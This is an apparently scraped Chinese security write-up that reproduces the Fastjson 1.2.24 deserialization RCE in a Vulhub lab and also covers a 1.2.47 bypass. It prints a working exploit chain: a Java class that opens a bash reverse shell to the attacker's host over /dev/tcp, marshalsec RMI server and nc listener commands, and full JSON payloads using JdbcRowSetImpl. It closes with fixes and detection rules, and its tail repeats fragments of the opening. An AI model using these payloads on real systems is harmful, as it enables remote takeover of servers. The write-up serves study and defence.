Fastjson 反序列化RCE漏洞复现与分析<\/h1>

漏洞概述<\/h2>
Fastjson是阿里巴巴开源的一个Java库，用于处理JSON数据格式的解析和生成。在Fastjson 1.2.24及之前版本中存在反序列化远程代码执行(RCE)漏洞，攻击者可以通过构造特殊的JSON数据，利用JNDI注入实现远程命令执行。<\/p>

漏洞原理<\/h2>

Fastjson反序列化机制<\/strong>：<\/p>

Fastjson在解析JSON对象时，会使用autoType实例化具体的类<\/li>
通过@type<\/code>字段可以指定要反序列化的目标类<\/li>
漏洞源于Fastjson对@type<\/code>字段的安全性验证不充分<\/li> <\/ul> <\/li>
JNDI注入<\/strong>：<\/p> JNDI(Java Naming and Directory Interface)支持RMI远程对象调用<\/li> 当Fastjson反序列化JdbcRowSetImpl<\/code>类时，会触发JNDI查询<\/li> 攻击者可控制JNDI查询指向恶意的RMI服务<\/li> <\/ul> <\/li> 攻击链<\/strong>：<\/p> Fastjson反序列化 → JdbcRowSetImpl.setDataSourceName() → JNDI查询 → RMI服务 → 加载恶意类 → 执行恶意代码 <\/code><\/pre> <\/li> <\/ol> 环境准备<\/h2> 靶机环境<\/h3> 使用Vulhub快速搭建Fastjson 1.2.24 RCE漏洞环境<\/li> 服务运行在8090端口<\/li> <\/ul> 攻击机环境<\/h3> Java 8运行环境<\/li> Python 3 (用于开启Web服务)<\/li> Netcat (用于监听反弹shell)<\/li> marshalsec工具 (用于搭建RMI服务)<\/li> <\/ul> 攻击步骤详解<\/h2> 1. 准备恶意类<\/h3> 创建reverse.java<\/code>文件，内容如下：<\/p> import<\/span> java.lang.Runtime;<\/span> <\/span><\/span>import<\/span> java.lang.Process;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> reverse<\/span> {<\/span> <\/span><\/span> static<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Runtime rt =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span> <\/span><\/span> String[]<\/span> commands =<\/span> {<\/span>"bash"<\/span>,<\/span> "-c"<\/span>,<\/span> "bash -i >& \/dev\/tcp\/攻击机IP\/4563 0>&1"<\/span>};<\/span> <\/span><\/span> Process pc =<\/span> rt.<\/span>exec<\/span>(<\/span>commands);<\/span> <\/span><\/span> pc.<\/span>waitFor<\/span>();<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> \/\/ 异常处理 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>编译为class文件：<\/p> javac reverse.java <\/span><\/span><\/code><\/pre>2. 启动Web服务<\/h3> 在恶意类所在目录启动Python Web服务：<\/p> python3 -m http.server 8989<\/span> <\/span><\/span><\/code><\/pre>3. 启动RMI服务<\/h3> 使用marshalsec工具启动RMI服务：<\/p> java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http:\/\/攻击机IP:8989\/#reverse"<\/span> 8653<\/span> <\/span><\/span><\/code><\/pre>4. 监听反弹shell<\/h3> nc -lnvp 4563<\/span> <\/span><\/span><\/code><\/pre>5. 构造并发送Payload<\/h3> 发送以下HTTP请求到目标服务器(8090端口)：<\/p> POST \/ HTTP\/1.1 Host: 目标IP:8090 Content-Type: application\/json Content-Length: 163 { "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi:\/\/攻击机IP:8653\/reverse", "autoCommit":true } } <\/code><\/pre> 6. 攻击流程分析<\/h3> 目标服务器解析JSON时，通过@type<\/code>指定反序列化为JdbcRowSetImpl<\/code>类<\/li> 设置dataSourceName<\/code>属性为攻击者控制的RMI服务地址<\/li> 设置autoCommit<\/code>为true触发setAutoCommit()<\/code>方法<\/li> setAutoCommit()<\/code>内部调用connect()<\/code>方法，发起JNDI查询<\/li> 目标服务器向攻击者的RMI服务(8653端口)发起请求<\/li> RMI服务返回指向恶意类(reverse.class<\/code>)的Reference对象<\/li> 目标服务器从攻击者的Web服务(8989端口)下载并执行恶意类<\/li> 恶意类中的静态代码块执行，建立反弹shell连接<\/li> <\/ol> Fastjson 1.2.47版本利用<\/h2> 对于Fastjson 1.2.47版本，可以使用以下Payload绕过限制：<\/p> { <\/span><\/span> "a"<\/span>:{ <\/span><\/span> "@type"<\/span>:"java.lang.Class"<\/span>, <\/span><\/span> "val"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span> <\/span><\/span> }, <\/span><\/span> "b"<\/span>:{ <\/span><\/span> "@type"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>, <\/span><\/span> "dataSourceName"<\/span>:"rmi:\/\/攻击机IP:8653\/reverse"<\/span>, <\/span><\/span> "autoCommit"<\/span>:true<\/span> <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>防御与修复方案<\/h2> 1. 代码层防护<\/h3> 升级Fastjson<\/strong>：<\/p> 使用Fastjson 2.x版本，默认关闭AutoType功能<\/li> 最低升级至1.2.68及以上安全版本<\/li> <\/ul> <\/li> 配置白名单<\/strong>：<\/p> ParserConfig.<\/span>getGlobalInstance<\/span>().<\/span>addAccept<\/span>(<\/span>"com.example.safe.*"<\/span>);<\/span> <\/span><\/span><\/code><\/pre><\/li> 启用安全模式<\/strong>：<\/p> ParserConfig.<\/span>getGlobalInstance<\/span>().<\/span>setSafeMode<\/span>(<\/span>true<\/span>);<\/span> \/\/ 完全禁用AutoType <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ul> 2. 运行时防护<\/h3> JVM参数限制<\/strong>：<\/p> -Dcom.sun.jndi.rmi.object.trustURLCodebase=<\/span>false <\/span><\/span>-Dcom.sun.jndi.ldap.object.trustURLCodebase=<\/span>false <\/span><\/span><\/code><\/pre><\/li> RASP防护<\/strong>：<\/p> 监控JdbcRowSetImpl.connect()<\/code>方法调用<\/li> 拦截InitialContext.lookup()<\/code>等敏感操作<\/li> <\/ul> <\/li> <\/ul> 3. 网络层管控<\/h3> 出口流量过滤<\/strong>：<\/p> 阻止服务器主动外联RMI、LDAP等协议<\/li> 限制出站连接只允许必要的域名和端口<\/li> <\/ul> <\/li> 入侵检测规则<\/strong>：<\/p> 检测@type<\/code>字段包含JdbcRowSetImpl<\/code>的请求<\/li> 监控异常的JNDI查询行为<\/li> <\/ul> <\/li> <\/ul> 技术要点总结<\/h2> Fastjson AutoType机制<\/strong>是漏洞根源，允许攻击者指定任意类进行实例化<\/li> JdbcRowSetImpl类<\/strong>是关键跳板，其setDataSourceName<\/code>和setAutoCommit<\/code>方法组合可触发JNDI查询<\/li> RMI协议<\/strong>用于传递恶意类引用，Web服务用于托管实际的恶意类文件<\/li> 静态代码块<\/strong>在类加载时自动执行，是常见的恶意代码注入点<\/li> 版本差异<\/strong>：不同Fastjson版本需要调整Payload构造方式<\/li> <\/ol> 参考资源<\/h2> Fastjson官方GitHub仓库及安全公告<\/li> JNDI注入原理及防护指南<\/li> Java反序列化漏洞研究资料<\/li> marshalsec工具使用文档<\/li> <\/ol> 通过以上详细分析，安全研究人员可以全面理解Fastjson反序列化漏洞的原理、利用方式及防御措施，在实际环境中有效识别和防范此类安全风险。<\/p>

Fastjson 反序列化RCE漏洞复现与分析<\/h1>

漏洞概述<\/h2> Fastjson是阿里巴巴开源的一个Java库，用于处理JSON数据格式的解析和生成。在Fastjson 1.2.24及之前版本中存在反序列化远程代码执行(RCE)漏洞，攻击者可以通过构造特殊的JSON数据，利用JNDI注入实现远程命令执行。<\/p>

环境准备<\/h2>

攻击步骤详解<\/h2>

防御与修复方案<\/h2>

漏洞概述<\/h2>
Fastjson是阿里巴巴开源的一个Java库，用于处理JSON数据格式的解析和生成。在Fastjson 1.2.24及之前版本中存在反序列化远程代码执行(RCE)漏洞，攻击者可以通过构造特殊的JSON数据，利用JNDI注入实现远程命令执行。<\/p>